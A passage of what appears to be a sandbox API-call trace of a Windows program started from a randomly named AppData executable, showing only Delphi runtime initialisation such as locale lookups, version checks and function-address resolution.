hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0099.711] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0099.711] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.711] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x14e80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0099.711] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0099.711] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0099.711] GetThreadLocale () returned 0x409 [0099.711] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0099.711] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0099.711] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.711] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0099.711] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0099.711] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x7044f0 [0099.711] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0099.712] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0099.712] GetLastError () returned 0x7a [0099.712] GetLogicalProcessorInformation (in: Buffer=0x14d99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14d99d0, ReturnedLength=0x12fab0) returned 1 [0099.712] GetCurrentThreadId () returned 0xc18 [0099.712] GetCurrentThreadId () returned 0xc18 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0099.712] GetThreadLocale () returned 0x409 [0099.712] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0099.712] GetThreadLocale () returned 0x409 [0099.712] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0099.712] GetCurrentThreadId () returned 0xc18 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0099.712] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0099.713] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0099.713] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0099.713] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0099.713] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0099.713] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0099.714] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0099.714] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0099.714] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0099.714] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0099.715] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15650377831) returned 1 [0099.715] GetTickCount () returned 0x23d1e [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15650392254) returned 1 [0099.715] GetTickCount () returned 0x23d1e [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xd, wMilliseconds=0xa9)) [0099.715] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x14e82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14d288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x14e82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x14e82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0099.715] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0099.715] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0099.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x14ef48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0099.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0099.716] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0099.716] GetThreadLocale () returned 0x409 [0099.716] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0099.716] GetCurrentThreadId () returned 0xc18 [0099.716] GetCurrentThreadId () returned 0xc18 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0099.716] GetThreadLocale () returned 0x409 [0099.716] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0099.716] GetThreadLocale () returned 0x409 [0099.716] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0099.716] GetCurrentThreadId () returned 0xc18 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0099.716] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0099.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 